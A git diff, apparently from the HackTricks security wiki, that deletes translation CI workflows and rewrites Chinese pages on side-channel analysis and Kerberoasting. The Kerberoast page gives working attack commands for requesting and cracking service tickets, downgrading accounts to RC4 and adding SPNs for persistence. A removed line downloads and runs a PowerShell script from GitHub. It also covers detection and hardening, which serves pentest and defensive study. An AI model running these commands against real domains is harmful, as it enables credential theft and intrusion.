runs-on: ubuntu-latest - environment: prod - env: - LANGUAGE: Swahili - BRANCH: sw - - steps: - - name: Checkout code - uses: actions/checkout@v2 - with: - fetch-depth: 0 #Needed to download everything to be able to access the master & language branches - - - name: Set up Python - uses: actions/setup-python@v2 - with: - python-version: 3.12 - - - name: Install python dependencies - run: | - python -m pip install --upgrade pip - pip3 install openai tqdm tiktoken - - # Install Rust and Cargo - - name: Install Rust and Cargo - uses: actions-rs/toolchain@v1 - with: - toolchain: stable - override: true - - # Install mdBook and Plugins - - name: Install mdBook and Plugins - run: | - cargo install mdbook - cargo install mdbook-alerts - cargo install mdbook-reading-time - cargo install mdbook-pagetoc - cargo install mdbook-tabs - cargo install mdbook-codename - - - - name: Update & install wget & translator.py - run: | - sudo apt-get update - sudo apt-get install wget -y - mkdir scripts - cd scripts - wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py - cd .. - - - name: Download language branch #Make sure we have last version - run: | - git config --global user.name 'Translator' - git config --global user.email 'github-actions@github.com' - git checkout "$BRANCH" - git pull - git checkout master - - - name: Run translation script on changed files - run: | - echo "Starting translations" - echo "Commit: $GITHUB_SHA" - - # Export the OpenAI API key as an environment variable - export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} - - # Run the translation script on each changed file - git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do - if echo "$file" | grep -qE '\.md$'; then - echo -n "$file , " >> /tmp/file_paths.txt - else - echo "Skipping $file" - fi - done - - echo "Translating $(cat /tmp/file_paths.txt)" - python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 - - # Push changes to the repository - - name: Commit and push changes - run: | - git checkout "$BRANCH" - git add -A - git commit -m "Translated $BRANCH files" || true - git push --set-upstream origin "$BRANCH" - - # Build the mdBook - - name: Build mdBook - run: mdbook build - - # Login in AWs - - name: Configure AWS credentials using OIDC - uses: aws-actions/configure-aws-credentials@v3 - with: - role-to-assume: ${{ secrets.AWS_ROLE_ARN }} - aws-region: us-east-1 - - # Sync the build to S3 - - name: Sync to S3 - run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete \ No newline at end of file diff --git a/.github/workflows/translate_tr.yml b/.github/workflows/translate_tr.yml deleted file mode 100644 index 13571575b..000000000 --- a/.github/workflows/translate_tr.yml +++ /dev/null @@ -1,119 +0,0 @@ -name: Translator to TR (Turkish) - -on: - push: - branches: - - master - paths-ignore: - - 'scripts/**' - - '.gitignore' - - '.github/**' - workflow_dispatch: - -concurrency: tr - -permissions: - id-token: write - contents: write - -jobs: - run-translation: - runs-on: ubuntu-latest - environment: prod - env: - LANGUAGE: Turkish - BRANCH: tr - - steps: - - name: Checkout code - uses: actions/checkout@v2 - with: - fetch-depth: 0 #Needed to download everything to be able to access the master & language branches - - - name: Set up Python - uses: actions/setup-python@v2 - with: - python-version: 3.12 - - - name: Install python dependencies - run: | - python -m pip install --upgrade pip - pip3 install openai tqdm tiktoken - - # Install Rust and Cargo - - name: Install Rust and Cargo - uses: actions-rs/toolchain@v1 - with: - toolchain: stable - override: true - - # Install mdBook and Plugins - - name: Install mdBook and Plugins - run: | - cargo install mdbook - cargo install mdbook-alerts - cargo install mdbook-reading-time - cargo install mdbook-pagetoc - cargo install mdbook-tabs - cargo install mdbook-codename - - - - name: Update & install wget & translator.py - run: | - sudo apt-get update - sudo apt-get install wget -y - mkdir scripts - cd scripts - wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py - cd .. - - - name: Download language branch #Make sure we have last version - run: | - git config --global user.name 'Translator' - git config --global user.email 'github-actions@github.com' - git checkout "$BRANCH" - git pull - git checkout master - - - name: Run translation script on changed files - run: | - echo "Starting translations" - echo "Commit: $GITHUB_SHA" - - # Export the OpenAI API key as an environment variable - export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} - - # Run the translation script on each changed file - git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do - if echo "$file" | grep -qE '\.md$'; then - echo -n "$file , " >> /tmp/file_paths.txt - else - echo "Skipping $file" - fi - done - - echo "Translating $(cat /tmp/file_paths.txt)" - python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 - - # Push changes to the repository - - name: Commit and push changes - run: | - git checkout "$BRANCH" - git add -A - git commit -m "Translated $BRANCH files" || true - git push --set-upstream origin "$BRANCH" - - # Build the mdBook - - name: Build mdBook - run: mdbook build - - # Login in AWs - - name: Configure AWS credentials using OIDC - uses: aws-actions/configure-aws-credentials@v3 - with: - role-to-assume: ${{ secrets.AWS_ROLE_ARN }} - aws-region: us-east-1 - - # Sync the build to S3 - - name: Sync to S3 - run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete \ No newline at end of file diff --git a/.github/workflows/translate_uk.yml b/.github/workflows/translate_uk.yml deleted file mode 100644 index 4991a185c..000000000 --- a/.github/workflows/translate_uk.yml +++ /dev/null @@ -1,119 +0,0 @@ -name: Translator to UK (Ukranian) - -on: - push: - branches: - - master - paths-ignore: - - 'scripts/**' - - '.gitignore' - - '.github/**' - workflow_dispatch: - -concurrency: uk - -permissions: - id-token: write - contents: write - -jobs: - run-translation: - runs-on: ubuntu-latest - environment: prod - env: - LANGUAGE: Ukranian - BRANCH: uk - - steps: - - name: Checkout code - uses: actions/checkout@v2 - with: - fetch-depth: 0 #Needed to download everything to be able to access the master & language branches - - - name: Set up Python - uses: actions/setup-python@v2 - with: - python-version: 3.12 - - - name: Install python dependencies - run: | - python -m pip install --upgrade pip - pip3 install openai tqdm tiktoken - - # Install Rust and Cargo - - name: Install Rust and Cargo - uses: actions-rs/toolchain@v1 - with: - toolchain: stable - override: true - - # Install mdBook and Plugins - - name: Install mdBook and Plugins - run: | - cargo install mdbook - cargo install mdbook-alerts - cargo install mdbook-reading-time - cargo install mdbook-pagetoc - cargo install mdbook-tabs - cargo install mdbook-codename - - - - name: Update & install wget & translator.py - run: | - sudo apt-get update - sudo apt-get install wget -y - mkdir scripts - cd scripts - wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py - cd .. - - - name: Download language branch #Make sure we have last version - run: | - git config --global user.name 'Translator' - git config --global user.email 'github-actions@github.com' - git checkout "$BRANCH" - git pull - git checkout master - - - name: Run translation script on changed files - run: | - echo "Starting translations" - echo "Commit: $GITHUB_SHA" - - # Export the OpenAI API key as an environment variable - export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} - - # Run the translation script on each changed file - git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do - if echo "$file" | grep -qE '\.md$'; then - echo -n "$file , " >> /tmp/file_paths.txt - else - echo "Skipping $file" - fi - done - - echo "Translating $(cat /tmp/file_paths.txt)" - python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 - - # Push changes to the repository - - name: Commit and push changes - run: | - git checkout "$BRANCH" - git add -A - git commit -m "Translated $BRANCH files" || true - git push --set-upstream origin "$BRANCH" - - # Build the mdBook - - name: Build mdBook - run: mdbook build - - # Login in AWs - - name: Configure AWS credentials using OIDC - uses: aws-actions/configure-aws-credentials@v3 - with: - role-to-assume: ${{ secrets.AWS_ROLE_ARN }} - aws-region: us-east-1 - - # Sync the build to S3 - - name: Sync to S3 - run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete diff --git a/.github/workflows/translate_zh.yml b/.github/workflows/translate_zh.yml deleted file mode 100644 index ed59a8d34..000000000 --- a/.github/workflows/translate_zh.yml +++ /dev/null @@ -1,119 +0,0 @@ -name: Translator to ZH (Chinese) - -on: - push: - branches: - - master - paths-ignore: - - 'scripts/**' - - '.gitignore' - - '.github/**' - workflow_dispatch: - -concurrency: zh - -permissions: - id-token: write - contents: write - -jobs: - run-translation: - runs-on: ubuntu-latest - environment: prod - env: - LANGUAGE: Chinese - BRANCH: zh - - steps: - - name: Checkout code - uses: actions/checkout@v2 - with: - fetch-depth: 0 #Needed to download everything to be able to access the master & language branches - - - name: Set up Python - uses: actions/setup-python@v2 - with: - python-version: 3.12 - - - name: Install python dependencies - run: | - python -m pip install --upgrade pip - pip3 install openai tqdm tiktoken - - # Install Rust and Cargo - - name: Install Rust and Cargo - uses: actions-rs/toolchain@v1 - with: - toolchain: stable - override: true - - # Install mdBook and Plugins - - name: Install mdBook and Plugins - run: | - cargo install mdbook - cargo install mdbook-alerts - cargo install mdbook-reading-time - cargo install mdbook-pagetoc - cargo install mdbook-tabs - cargo install mdbook-codename - - - - name: Update & install wget & translator.py - run: | - sudo apt-get update - sudo apt-get install wget -y - mkdir scripts - cd scripts - wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py - cd .. - - - name: Download language branch #Make sure we have last version - run: | - git config --global user.name 'Translator' - git config --global user.email 'github-actions@github.com' - git checkout "$BRANCH" - git pull - git checkout master - - - name: Run translation script on changed files - run: | - echo "Starting translations" - echo "Commit: $GITHUB_SHA" - - # Export the OpenAI API key as an environment variable - export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} - - # Run the translation script on each changed file - git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do - if echo "$file" | grep -qE '\.md$'; then - echo -n "$file , " >> /tmp/file_paths.txt - else - echo "Skipping $file" - fi - done - - echo "Translating $(cat /tmp/file_paths.txt)" - python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3 - - # Push changes to the repository - - name: Commit and push changes - run: | - git checkout "$BRANCH" - git add -A - git commit -m "Translated $BRANCH files" || true - git push --set-upstream origin "$BRANCH" - - # Build the mdBook - - name: Build mdBook - run: mdbook build - - # Login in AWs - - name: Configure AWS credentials using OIDC - uses: aws-actions/configure-aws-credentials@v3 - with: - role-to-assume: ${{ secrets.AWS_ROLE_ARN }} - aws-region: us-east-1 - - # Sync the build to S3 - - name: Sync to S3 - run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete \ No newline at end of file diff --git a/src/todo/hardware-hacking/side_channel_analysis.md b/src/todo/hardware-hacking/side_channel_analysis.md index b20bc8a7c..ecc3f8143 100644 --- a/src/todo/hardware-hacking/side_channel_analysis.md +++ b/src/todo/hardware-hacking/side_channel_analysis.md @@ -10,7 +10,7 @@ | 通道 | 典型目标 | 仪器 | |---------|---------------|-----------------| -| 功耗 | 智能卡、物联网MCU、FPGA | 示波器 + 分流电阻/高频探头(例如CW503) | +| 电力消耗 | 智能卡、物联网MCU、FPGA | 示波器 + 分流电阻/高频探头(例如CW503) | | 电磁场(EM) | CPU、RFID、AES加速器 | H场探头 + LNA,ChipWhisperer/RTL-SDR | | 执行时间/缓存 | 桌面和云CPU | 高精度计时器(rdtsc/rdtscp),远程飞行时间 | | 声学/机械 | 键盘、3D打印机、继电器 | MEMS麦克风,激光振动计 | @@ -19,9 +19,9 @@ --- -## 功率分析 +## 电力分析 -### 简单功率分析(SPA) +### 简单电力分析(SPA) 观察*单个*波形并直接将峰值/谷值与操作(例如DES S盒)关联。 ```python # ChipWhisperer-husky example – capture one AES trace @@ -40,7 +40,7 @@ print(trace.wave) # numpy array of power samples import numpy as np corr = np.corrcoef(leakage_model(k), traces[:,sample]) ``` -CPA 仍然是最先进的,但机器学习变体(MLA,深度学习 SCA)现在主导了 ASCAD-v2(2023)等比赛。 +CPA 仍然是最先进的技术,但机器学习变体(MLA,深度学习 SCA)现在主导了 ASCAD-v2(2023)等比赛。 --- @@ -49,16 +49,12 @@ CPA 仍然是最先进的,但机器学习变体(MLA,深度学习 SCA)现 --- -## 时序与微架构攻击 +## 定时与微架构攻击 现代 CPU 通过共享资源泄漏秘密: -* **Hertzbleed (2022)** – DVFS 频率缩放与 Hamming 权重相关,允许 *远程* 提取 EdDSA 密钥。 -* **Downfall / Gather Data Sampling (Intel, 2023)** – 瞬态执行读取 SMT 线程中的 AVX-gather 数据。 +* **Hertzbleed (2022)** – DVFS 频率缩放与汉明权重相关,允许 *远程* 提取 EdDSA 密钥。 +* **Downfall / Gather Data Sampling (Intel, 2023)** – 瞬态执行读取跨 SMT 线程的 AVX-gather 数据。 * **Zenbleed (AMD, 2023) & Inception (AMD, 2023)** – 投机向量误预测泄漏跨域寄存器。 -有关 Spectre 类问题的广泛处理,请参见 {{#ref}} -../../cpu-microarchitecture/microarchitectural-attacks.md -{{#endref}} - --- ## 声学与光学攻击 @@ -95,7 +91,7 @@ CPA 仍然是最先进的,但机器学习变体(MLA,深度学习 SCA)现 ## 工具与框架 * **ChipWhisperer-Husky** (2024) – 500 MS/s 示波器 + Cortex-M 触发器;Python API 如上。 -* **Riscure Inspector & FI** – 商业,支持自动泄漏评估(TVLA-2.0)。 +* **Riscure Inspector & FI** – 商业,支持自动化泄漏评估(TVLA-2.0)。 * **scaaml** – 基于 TensorFlow 的深度学习 SCA 库(v1.2 – 2025)。 * **pyecsca** – ANSSI 开源 ECC SCA 框架。 diff --git a/src/windows-hardening/active-directory-methodology/kerberoast.md b/src/windows-hardening/active-directory-methodology/kerberoast.md index d17f35fa4..a50e4bc3a 100644 --- a/src/windows-hardening/active-directory-methodology/kerberoast.md +++ b/src/windows-hardening/active-directory-methodology/kerberoast.md @@ -4,172 +4,215 @@ ## Kerberoast -Kerberoasting 关注于获取 **TGS tickets**,特别是与 **Active Directory (AD)** 中的 **用户账户** 相关的服务,排除 **计算机账户**。这些票证的加密使用源自 **用户密码** 的密钥,从而允许 **离线凭证破解** 的可能性。使用用户账户作为服务的标志是 **"ServicePrincipalName"** 属性非空。 +Kerberoasting 主要集中在获取 TGS 票证,特别是与在 Active Directory (AD) 中以用户帐户运行的服务相关的票证,排除计算机帐户。这些票证的加密使用源自用户密码的密钥,从而允许离线凭证破解。使用用户帐户作为服务的标志是非空的 ServicePrincipalName (SPN) 属性。 -要执行 **Kerberoasting**,需要一个能够请求 **TGS tickets** 的域账户;然而,这个过程并不需要 **特殊权限**,使得任何拥有 **有效域凭证** 的人都可以访问。 +任何经过身份验证的域用户都可以请求 TGS 票证,因此不需要特殊权限。 -### 关键点: +### 关键点 -- **Kerberoasting** 针对 **AD** 中的 **用户账户服务** 的 **TGS tickets**。 -- 使用 **用户密码** 的密钥加密的票证可以 **离线破解**。 -- 服务通过 **ServicePrincipalName** 的非空值来识别。 -- **不需要特殊权限**,只需 **有效域凭证**。 - -### **攻击** +- 针对以用户帐户运行的服务的 TGS 票证(即,设置了 SPN 的帐户;不是计算机帐户)。 +- 票证使用源自服务帐户密码的密钥进行加密,可以离线破解。 +- 不需要提升权限;任何经过身份验证的帐户都可以请求 TGS 票证。 > [!WARNING] -> **Kerberoasting 工具** 通常在执行攻击和发起 TGS-REQ 请求时请求 **`RC4 encryption`**。这是因为 **RC4 是** [**较弱的**](https://www.stigviewer.com/stig/windows_10/2017-04-28/finding/V-63795),并且比其他加密算法如 AES-128 和 AES-256 更容易使用工具如 Hashcat 进行离线破解。\ -> RC4 (类型 23) 哈希以 **`$krb5tgs$23$*`** 开头,而 AES-256 (类型 18) 以 **`$krb5tgs$18$*`** 开头。\ -> 此外,请小心,因为 `Rubeus.exe kerberoast` 会自动请求所有易受攻击账户的票证,这会导致被检测。首先,找到具有有趣权限的可 kerberoast 的用户,然后仅对他们运行。 -```bash +> 大多数公共工具更倾向于请求 RC4-HMAC (etype 23) 服务票证,因为它们比 AES 更容易破解。RC4 TGS 哈希以 `$krb5tgs$23$*` 开头,AES128 以 `$krb5tgs$17$*` 开头,AES256 以 `$krb5tgs$18$*` 开头。然而,许多环境正在转向仅使用 AES。不要假设只有 RC4 是相关的。 +> 此外,避免“喷洒和祈祷”式的烤制。Rubeus 的默认 kerberoast 可以查询并请求所有 SPN 的票证,并且会产生噪音。首先枚举并针对有趣的主体。 -#### **Linux** - -```bash -# Metasploit framework -msf> use auxiliary/gather/get_user_spns -# Impacket -GetUserSPNs.py -request -dc-ip / -outputfile hashes.kerberoast # 密码将被提示 -GetUserSPNs.py -request -dc-ip -hashes : / -outputfile hashes.kerberoast -# kerberoast: https://github.com/skelsec/kerberoast -kerberoast ldap spn 'ldap+ntlm-password://\:@' -o kerberoastable # 1. 枚举可kerberoast的用户 -kerberoast spnroast 'kerberos+password://\:@' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. 转储哈希 -``` - -Multi-features tools including a dump of kerberoastable users: - -```bash -# ADenum: https://github.com/SecuProject/ADenum -adenum -d -ip -u -p -c -``` - -#### Windows - -- **Enumerate Kerberoastable users** - -```bash -# 获取可Kerberoast的用户 -setspn.exe -Q */* #这是一个内置的二进制文件。关注用户账户 -Get-NetUser -SPN | select serviceprincipalname #Powerview -.\Rubeus.exe kerberoast /stats -``` - -- **Technique 1: Ask for TGS and dump it from memory** - -```bash -# 从单个用户获取内存中的 TGS -Add-Type -AssemblyName System.IdentityModel -New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #示例: MSSQLSvc/mgmt.domain.local - -# 获取所有可进行 kerberoast 的账户的 TGS(包括 PC,不太聪明) -setspn.exe -T DOMAIN_NAME.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } - -# 列出内存中的 kerberos 票据 -klist - -# 从内存中提取它们 -Invoke-Mimikatz -Command '"kerberos::list /export"' #将票据导出到当前文件夹 - -# 将 kirbi 票据转换为 john -python2.7 kirbi2john.py sqldev.kirbi -# 将 john 转换为 hashcat -sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat -``` - -- **Technique 2: Automatic tools** - -```bash -# Powerview: 获取用户的 Kerberoast 哈希 -Request-SPNTicket -SPN "" -Format Hashcat #使用 PowerView 示例: MSSQLSvc/mgmt.domain.local -# Powerview: 获取所有 Kerberoast 哈希 -Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation - -# Rubeus -.\Rubeus.exe kerberoast /outfile:hashes.kerberoast -.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #特定用户 -.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap #获取管理员 - -# Invoke-Kerberoast -iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") -Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast -``` - -> [!WARNING] -> When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated. - -### Cracking - -```bash -john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast -hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt -./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -``` - -### Persistence - -If you have **enough permissions** over a user you can **make it kerberoastable**: - -```bash -Set-DomainObject -Identity -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose -``` - -You can find useful **tools** for **kerberoast** attacks here: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast) - -If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC. There are a few options: - -- `ntpdate ` - Deprecated as of Ubuntu 16.04 -- `rdate -n ` - -### Mitigation - -Kerberoasting can be conducted with a high degree of stealthiness if it is exploitable. In order to detect this activity, attention should be paid to **Security Event ID 4769**, which indicates that a Kerberos ticket has been requested. However, due to the high frequency of this event, specific filters must be applied to isolate suspicious activities: - -- The service name should not be **krbtgt**, as this is a normal request. -- Service names ending with **$** should be excluded to avoid including machine accounts used for services. -- Requests from machines should be filtered out by excluding account names formatted as **machine@domain**. -- Only successful ticket requests should be considered, identified by a failure code of **'0x0'**. -- **Most importantly**, the ticket encryption type should be **0x17**, which is often used in Kerberoasting attacks. - -```bash -获取事件 -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message -``` - -To mitigate the risk of Kerberoasting: - -- Ensure that **Service Account Passwords are difficult to guess**, recommending a length of more than **25 characters**. -- Utilize **Managed Service Accounts**, which offer benefits like **automatic password changes** and **delegated Service Principal Name (SPN) Management**, enhancing security against such attacks. - -By implementing these measures, organizations can significantly reduce the risk associated with Kerberoasting. - -## Kerberoast w/o domain account - -In **September 2022**, a new way to exploit a system was brought to light by a researcher named Charlie Clark, shared through his platform [exploit.ph](https://exploit.ph/). This method allows for the acquisition of **Service Tickets (ST)** via a **KRB_AS_REQ** request, which remarkably does not necessitate control over any Active Directory account. Essentially, if a principal is set up in such a way that it doesn't require pre-authentication—a scenario similar to what's known in the cybersecurity realm as an **AS-REP Roasting attack**—this characteristic can be leveraged to manipulate the request process. Specifically, by altering the **sname** attribute within the request's body, the system is deceived into issuing a **ST** rather than the standard encrypted Ticket Granting Ticket (TGT). - -The technique is fully explained in this article: [Semperis blog post](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/). - -> [!WARNING] -> You must provide a list of users because we don't have a valid account to query the LDAP using this technique. +### 攻击 #### Linux - -- [impacket/GetUserSPNs.py from PR #1413](https://github.com/fortra/impacket/pull/1413): - ```bash -GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/ -``` +# Metasploit Framework +msf> use auxiliary/gather/get_user_spns +# Impacket — request and save roastable hashes (prompts for password) +GetUserSPNs.py -request -dc-ip / -outputfile hashes.kerberoast +# With NT hash +GetUserSPNs.py -request -dc-ip -hashes : / -outputfile hashes.kerberoast +# Target a specific user’s SPNs only (reduce noise) +GetUserSPNs.py -request-user -dc-ip / + +# kerberoast by @skelsec (enumerate and roast) +# 1) Enumerate kerberoastable users via LDAP +kerberoast ldap spn 'ldap+ntlm-password://\\:@' -o kerberoastable +# 2) Request TGS for selected SPNs and dump +kerberoast spnroast 'kerberos+password://\\:@' -t kerberoastable_spn_users.txt -o kerberoast.hashes +``` +多功能工具,包括 kerberoast 检查: +```bash +# ADenum: https://github.com/SecuProject/ADenum +adenum -d -ip -u -p -c +``` #### Windows -- [GhostPack/Rubeus from PR #139](https://github.com/GhostPack/Rubeus/pull/139): +- 枚举可进行 Kerberoast 的用户 +```powershell +# Built-in +setspn.exe -Q */* # Focus on entries where the backing object is a user, not a computer ($) -```bash -Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE" +# PowerView +Get-NetUser -SPN | Select-Object serviceprincipalname + +# Rubeus stats (AES/RC4 coverage, pwd-last-set years, etc.) +.\Rubeus.exe kerberoast /stats ``` +- 技术 1:请求 TGS 并从内存中转储 +```powershell +# Acquire a single service ticket in memory for a known SPN +Add-Type -AssemblyName System.IdentityModel +New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "" # e.g. MSSQLSvc/mgmt.domain.local -## References +# Get all cached Kerberos tickets +klist + +# Export tickets from LSASS (requires admin) +Invoke-Mimikatz -Command '"kerberos::list /export"' + +# Convert to cracking formats +python2.7 kirbi2john.py .\some_service.kirbi > tgs.john +# Optional: convert john -> hashcat etype23 if needed +sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$*\1*$\2/' tgs.john > tgs.hashcat +``` +- 技术 2:自动化工具 +```powershell +# PowerView — single SPN to hashcat format +Request-SPNTicket -SPN "" -Format Hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast +# PowerView — all user SPNs -> CSV +Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation + +# Rubeus — default kerberoast (be careful, can be noisy) +.\Rubeus.exe kerberoast /outfile:hashes.kerberoast +# Rubeus — target a single account +.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast +# Rubeus — target admins only +.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap +``` +> [!WARNING] +> TGS 请求生成 Windows 安全事件 4769(请求了 Kerberos 服务票证)。 + +### OPSEC 和仅 AES 环境 + +- 故意请求 RC4 以便于没有 AES 的账户: +- Rubeus: `/rc4opsec` 使用 tgtdeleg 枚举没有 AES 的账户并请求 RC4 服务票证。 +- Rubeus: `/tgtdeleg` 与 kerberoast 一起也会在可能的情况下触发 RC4 请求。 +- 烤制仅 AES 账户而不是静默失败: +- Rubeus: `/aes` 枚举启用了 AES 的账户并请求 AES 服务票证(类型 17/18)。 +- 如果您已经持有 TGT(PTT 或来自 .kirbi),可以使用 `/ticket:` 与 `/spn:` 或 `/spns:` 并跳过 LDAP。 +- 目标、限流和减少噪音: +- 使用 `/user:`、`/spn:`、`/resultlimit:`、`/delay:` 和 `/jitter:<1-100>`。 +- 使用 `/pwdsetbefore:`(较旧的密码)过滤可能的弱密码,或使用 `/ou:` 目标特权 OU。 + +示例(Rubeus): +```powershell +# Kerberoast only AES-enabled accounts +.\Rubeus.exe kerberoast /aes /outfile:hashes.aes +# Request RC4 for accounts without AES (downgrade via tgtdeleg) +.\Rubeus.exe kerberoast /rc4opsec /outfile:hashes.rc4 +# Roast a specific SPN with an existing TGT from a non-domain-joined host +.\Rubeus.exe kerberoast /ticket:C:\\temp\\tgt.kirbi /spn:MSSQLSvc/sql01.domain.local +``` +### 破解 +```bash +# John the Ripper +john --format=krb5tgs --wordlist=wordlist.txt hashes.kerberoast + +# Hashcat +# RC4-HMAC (etype 23) +hashcat -m 13100 -a 0 hashes.rc4 wordlist.txt +# AES128-CTS-HMAC-SHA1-96 (etype 17) +hashcat -m 19600 -a 0 hashes.aes128 wordlist.txt +# AES256-CTS-HMAC-SHA1-96 (etype 18) +hashcat -m 19700 -a 0 hashes.aes256 wordlist.txt +``` +### 持久性 / 滥用 + +如果您控制或可以修改一个账户,您可以通过添加 SPN 使其可进行 kerberoast: +```powershell +Set-DomainObject -Identity -Set @{serviceprincipalname='fake/WhateverUn1Que'} -Verbose +``` +将帐户降级以启用 RC4 以便于破解(需要对目标对象的写入权限): +```powershell +# Allow only RC4 (value 4) — very noisy/risky from a blue-team perspective +Set-ADUser -Identity -Replace @{msDS-SupportedEncryptionTypes=4} +# Mixed RC4+AES (value 28) +Set-ADUser -Identity -Replace @{msDS-SupportedEncryptionTypes=28} +``` +您可以在此处找到用于kerberoast攻击的有用工具:https://github.com/nidem/kerberoast + +如果您在Linux上遇到此错误:`Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great)`,这可能是由于本地时间偏差。请与DC同步: + +- `ntpdate `(在某些发行版上已弃用) +- `rdate -n ` + +### 检测 + +Kerberoasting可以是隐蔽的。寻找来自DC的事件ID 4769,并应用过滤器以减少噪音: + +- 排除服务名称`krbtgt`和以`$`结尾的服务名称(计算机帐户)。 +- 排除来自机器帐户的请求(`*$$@*`)。 +- 仅成功请求(失败代码`0x0`)。 +- 跟踪加密类型:RC4(`0x17`),AES128(`0x11`),AES256(`0x12`)。不要仅对`0x17`发出警报。 + +示例PowerShell初步分析: +```powershell +Get-WinEvent -FilterHashtable @{Logname='Security'; ID=4769} -MaxEvents 1000 | +Where-Object { +($_.Message -notmatch 'krbtgt') -and +($_.Message -notmatch '\$$') -and +($_.Message -match 'Failure Code:\s+0x0') -and +($_.Message -match 'Ticket Encryption Type:\s+(0x17|0x12|0x11)') -and +($_.Message -notmatch '\$@') +} | +Select-Object -ExpandProperty Message +``` +额外的想法: + +- 基于每个主机/用户的正常 SPN 使用情况建立基线;对来自单个主体的大量不同 SPN 请求进行警报。 +- 标记在 AES 加固域中不寻常的 RC4 使用情况。 + +### 缓解 / 加固 + +- 对服务使用 gMSA/dMSA 或机器账户。托管账户具有 120+ 字符的随机密码并自动轮换,使离线破解不切实际。 +- 通过将 `msDS-SupportedEncryptionTypes` 设置为仅 AES(十进制 24 / 十六进制 0x18)来强制服务账户使用 AES,然后轮换密码以派生 AES 密钥。 +- 在可能的情况下,禁用环境中的 RC4 并监控尝试使用 RC4 的情况。在 DC 上,您可以使用 `DefaultDomainSupportedEncTypes` 注册表值来引导未设置 `msDS-SupportedEncryptionTypes` 的账户的默认值。进行彻底测试。 +- 从用户账户中删除不必要的 SPN。 +- 如果托管账户不可行,请使用长且随机的服务账户密码(25+ 字符);禁止常见密码并定期审计。 + +### 无域账户的 Kerberoast(AS 请求的 ST) + +在 2022 年 9 月,Charlie Clark 表明,如果主体不需要预身份验证,则可以通过修改请求体中的 sname 来获取服务票证,从而通过精心制作的 KRB_AS_REQ 获取服务票证,实际上获得了服务票证而不是 TGT。这与 AS-REP 烤制相似,并且不需要有效的域凭据。 + +详细信息请参见 Semperis 的文章“新攻击路径:AS 请求的 ST”。 + +> [!WARNING] +> 您必须提供用户列表,因为没有有效凭据,您无法使用此技术查询 LDAP。 + +Linux + +- Impacket (PR #1413): +```bash +GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile users.txt -dc-host dc.domain.local domain.local/ +``` +Windows + +- Rubeus 